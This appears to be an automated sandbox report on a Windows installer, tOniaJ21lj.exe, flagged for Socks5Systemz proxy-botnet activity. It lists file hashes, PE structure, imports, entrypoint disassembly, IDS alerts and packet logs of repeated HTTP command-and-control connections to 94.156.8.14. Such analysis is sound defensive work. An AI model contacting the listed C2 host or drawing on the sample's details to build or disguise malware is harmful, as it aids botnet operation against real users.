                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23312
                                                                                    Entropy (8bit):4.596242908851566
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                    MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                    SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                    SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                    SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.99883089957613
TrID:
• Win32 Executable (generic) a (10002005/4) 98.86%
• Inno Setup installer (109748/4) 1.08%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: tOniaJ21lj.exe
File size: 4'969'628 bytes
MD5: fa367a7d44377d2c3f684c3912fec827
SHA1: cb9e24a00431a7cccecf333b5d4ec34785389191
SHA256: 7256e9f673b78c62aae25f78902c393d758262202e8ab4e4b4f1d5d01cd4cd12
SHA512: 90edcd670a8b1354b7c016e8ea1980c768ecddb55de990261d1e88b3a524152a6710f72f79df5d7e4f791ae7c5f74aef7c0548f019613495309cc91ac4889ec5
SSDEEP: 98304:mijrTEGdwJoSZ3iYy6zAhDzjk9AuLS4HPaOMNRiYcMYO4:RPTEjl3IhLaAuL9iOERiYRYO4
TLSH: 633633DE4AE5DEBEF2ED8F368C11D2F5A167B440323C460D3A94D1DEA7225A2941F360
                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 2d2e3797b32b2b99
Entrypoint: 0x409b24
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 1
OS Version Minor: 0
File Version Major: 1
File Version Minor: 0
Subsystem Version Major: 1
Subsystem Version Minor: 0
Import Hash: 884310b1928934402ea6fec1dbd3cf5e
Instruction (entrypoint disassembly)
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007F45B8B35FF7h
call 00007F45B8B371FEh
call 00007F45B8B39429h
call 00007F45B8B39470h
call 00007F45B8B3BD63h
call 00007F45B8B3BECAh
xor eax, eax
push ebp
push 0040A1DBh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A1A4h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007F45B8B3C8F0h
call 00007F45B8B3C457h
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F45B8B39A59h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CDE4h
call 00007F45B8B360A8h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CDE4h]
mov dl, 01h
mov eax, 004072ECh
call 00007F45B8B3A2E8h
mov dword ptr [0040CDE8h], eax
xor edx, edx
push ebp
push 0040A15Ch
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F45B8B3C960h
mov dword ptr [0040CDF0h], eax
mov eax, dword ptr [0040CDF0h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F45B8B3CA9Ah
mov eax, dword ptr [0040CDF0h]
mov edx, 00000028h
call 00007F45B8B3A6E9h
mov edx, dword ptr [0040CDF0h]
cmp eax, dword ptr [edx+00h]
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9244 | 0x9400 | 00d95da090f9b045cc52199c7b36d118 | False | 0.6099820523648649 | data | 6.529731839731562 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x24c | 0x400 | 05e73e67429288e06500812b62979d5f | False | 0.3076171875 | data | 2.734223999371757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe48 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 54be3ee6577149680bc2c4b96413addb | False | 0.32288707386363635 | data | 4.464100021311754 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Resources
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.2781456953642384
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
Imports
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/24-19:43:31.633412 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52643 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:42:57.171208 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52623 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:26.414769 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52640 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:49.420215 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52655 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:40.013828 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52649 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:07.601992 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52629 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:53.737196 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52658 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:01.749476 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52626 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:10.177838 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52631 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:16.249164 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52635 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:44:00.280298 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52663 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:06.376941 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52628 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:00.233904 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52625 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:27.013923 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52641 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:52.482822 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52657 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:11.744384 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52632 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:15.633502 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52634 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:36.034207 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52646 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:45.320897 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52652 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:57.593794 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52661 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:18.748451 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52637 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:08.901351 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52630 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:13.030652 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52633 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:58.873534 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52662 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:42:55.670104 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52621 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:17.515047 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52636 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:34.748394 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52645 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:38.697972 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52648 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:41.371967 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52650 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:47.586566 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52653 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:23.899062 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52639 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:48.123287 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52654 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:34.149022 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52644 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:20.092414 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52638 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:37.280010 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52647 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:56.313009 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52660 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:42.763270 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52651 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:05.666289 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52627 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:50.748248 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52656 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:55.016662 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52659 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:43:29.603330 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52642 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:42:54.899608 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52618 | 80 | 192.168.2.5 | 94.156.8.14
06/11/24-19:42:58.732763 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 52624 | 80 | 192.168.2.5 | 94.156.8.14
                                                                                    Jun 11, 2024 19:43:14.390964985 CEST5263480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:14.391182899 CEST5263380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:14.391720057 CEST5263480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:14.396558046 CEST805263494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:15.523540974 CEST805263494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:15.523632050 CEST5263480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:15.633502007 CEST5263480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:15.638339996 CEST805263494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:16.122909069 CEST805263494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:16.123042107 CEST5263480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:16.243287086 CEST5263480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:16.244045019 CEST5263580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:16.248939037 CEST805263594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:16.249017954 CEST5263580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:16.249164104 CEST5263580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:16.249780893 CEST805263494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:16.249835968 CEST5263480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:16.253951073 CEST805263594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:17.387645960 CEST805263594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:17.387723923 CEST5263580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:17.508898973 CEST5263580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:17.509778976 CEST5263680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:17.513981104 CEST805263594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:17.514086008 CEST5263580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:17.514642000 CEST805263694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:17.514750004 CEST5263680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:17.515047073 CEST5263680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:17.520045042 CEST805263694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:18.622528076 CEST805263694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:18.622711897 CEST5263680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:18.742778063 CEST5263680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:18.743122101 CEST5263780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:18.748136044 CEST805263794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:18.748172045 CEST805263694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:18.748287916 CEST5263680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:18.748450994 CEST5263780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:18.748450994 CEST5263780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:18.753269911 CEST805263794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:19.964620113 CEST805263794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:19.964795113 CEST5263780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:20.087044954 CEST5263780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:20.087342978 CEST5263880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:20.092093945 CEST805263894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:20.092160940 CEST805263794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:20.092252970 CEST5263880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:20.092278004 CEST5263780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:20.092413902 CEST5263880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:20.097105980 CEST805263894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:21.310786963 CEST805263894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:21.310952902 CEST5263880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:21.430232048 CEST5263880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:21.430557013 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:21.435509920 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:21.435551882 CEST805263894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:21.435585976 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:21.435616016 CEST5263880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:21.435794115 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:21.440629005 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:22.622318983 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:22.622390032 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:22.730067968 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:22.735169888 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:23.212305069 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:23.212393045 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:23.321052074 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:23.325975895 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:23.790903091 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:23.790952921 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:23.899061918 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:23.904113054 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:24.357000113 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:24.357059956 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:24.477639914 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:24.478122950 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:24.598783970 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:24.598853111 CEST805263994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:24.599086046 CEST5263980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:24.599278927 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:24.599278927 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:24.604079962 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:25.743144035 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:25.743206978 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:25.852226019 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:25.857342958 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:26.306878090 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:26.307028055 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:26.414768934 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:26.419717073 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:26.887772083 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:26.887883902 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:27.008514881 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:27.008862019 CEST5264180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:27.013644934 CEST805264194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:27.013710022 CEST5264180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:27.013766050 CEST805264094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:27.013803959 CEST5264080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:27.013922930 CEST5264180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:27.018618107 CEST805264194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:28.152061939 CEST805264194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:28.152184010 CEST5264180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:28.274122000 CEST5264180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:28.274429083 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:28.279299974 CEST805264294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:28.279411077 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:28.279553890 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:28.279596090 CEST805264194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:28.279654980 CEST5264180192.168.2.594.156.8.14
